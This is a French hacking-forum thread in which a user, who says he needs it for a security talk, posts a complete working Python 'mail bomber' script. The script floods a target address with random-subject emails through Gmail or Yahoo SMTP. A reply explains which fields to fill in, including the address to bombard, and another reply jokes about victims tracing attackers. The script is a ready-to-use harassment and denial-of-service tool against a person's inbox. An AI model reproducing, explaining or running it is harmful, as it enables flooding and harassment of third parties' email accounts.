Aller au contenu
jereminfo07

[hacking] Mail bomber

Messages recommandés

Bonjour, 

J'ai un exposer à réaliser qui traite de la sécurité, la vulnérabilité des boites mails. J'aurai aimé réaliser une démonstration via un script exécutable Python mais je ne comprend pas bien le script en question. J 'en ai trouvé plusieurs sur le net. 
Pouvez vous me dire les endroit ou je doit mettre les adresses mails, mot de passe, le smtp... 

voici celui que je trouve le plus compacte: 

 

#!/usr/bin/python

#pybombmail.py by aBi71

#This code for education purpose only.

#Use it at your own risk !!!

 

import os

import smtplib

import getpass

import sys

 

 

server = raw_input ('Server Mail: ')

user = raw_input('Username: ')

passwd = getpass.getpass('Password: ')

 

 

to = raw_input('\nTo: ')

#subject = raw_input('Subject: ')

body = raw_input('Message: ')

total = input('Number of send: ')

 

if server == 'gmail':

    smtp_server = 'smtp.gmail.com'

    port = 587

elif server == 'yahoo':

    smtp_server = 'smtp.mail.yahoo.com'

    port = 25

else:

    print 'Applies only to gmail and yahoo.'

    sys.exit()

 

print ''

 

try:

    server = smtplib.SMTP(smtp_server,port)

    server.ehlo()

    if smtp_server == "smtp.gmail.com":

            server.starttls()

    server.login(user,passwd)

    for i in range(1, total+1):

        subject = os.urandom(9)

        msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body

        server.sendmail(user,to,msg)

        print "\rTotal emails sent: %i" % i

        sys.stdout.flush()

    server.quit()

    print '\n Done !!!'

except KeyboardInterrupt:

    print '[-] Canceled'

    sys.exit()

except smtplib.SMTPAuthenticationError:

    print '\n[!] The username or password you entered is incorrect.'

    sys.exit()

Partager ce message


Lien à poster

Salut

Y-a des forums plus appropriés pour ça. Mais je vais être sympa.

Il faut remplir les variables

server = raw_input ('Server Mail: ') #Type de serveur

user = raw_input('Username: ') #Identifiant de co

passwd = getpass.getpass('Password: ') #Mdp de co

 

to = raw_input('\nTo: ') #adresse mail à bombarder

#subject = raw_input('Subject: ') #Retirer le dièze en début de ligne pour mettre un sujet non-random

body = raw_input('Message: ') #Corps du message

total = input('Number of send: ') #Nombre d'envoi par bombardement

Pour comprendre le script, il faut avoir les bases en python et savoir un peu comment fonctionne SMTP.

Ne compte pas sur moi pour t'expliquer comment bypass les sécu 2FA et anti-spamming de GMail ou de Yahoo. T'est pas au bon endroit.

Modifié par Anon142
  • J'aime 2
  • Plusser (+1) 2

Partager ce message


Lien à poster
Il y a 5 heures, Anon142 a dit :

Ne compte pas sur moi pour t'expliquer comment bypass les sécu 2FA et anti-spamming de GMail ou de Yahoo. T'est pas au bon endroit.

:evil-plotting-raccoon:

et quand tu aura fait ton attaque.. Prie que la victime ne remontent pas jusqu'as toi ... Autrement dit, apprend aussi a bien te protégé..

si si, j'en connais qui ont jouer dans les attaque en tout genre et puis voir arriver 2 voitures non pas de police mais des mecs qui avait été attaqué, jte laisse devinez la suite

 

 

  • J'adore 1
  • Ahah 1
  • Plusser (+1) 1

Partager ce message


Lien à poster

merci les gars ! 
ou la non je ne vais rien attaqué du tout ! juste illustrer mes propos avec un simple exemple avec des boites mail bidons genre yopmail 

 

Modifié par jereminfo07
  • J'aime 3

Partager ce message


Lien à poster

Rejoindre la conversation

Vous pouvez publier maintenant et vous inscrire plus tard. Si vous avez un compte, connectez-vous maintenant pour publier avec votre compte.

Invité
Répondre à ce sujet…

×   Collé en tant que texte enrichi.   Coller en tant que texte brut à la place

  Seulement 75 émoticônes maximum sont autorisées.

×   Votre lien a été automatiquement intégré.   Afficher plutôt comme un lien

×   Votre contenu précédent a été rétabli.   Vider l’éditeur

×   Vous ne pouvez pas directement coller des images. Envoyez-les depuis votre ordinateur ou insérez-les depuis une URL.


×
×
  • Créer...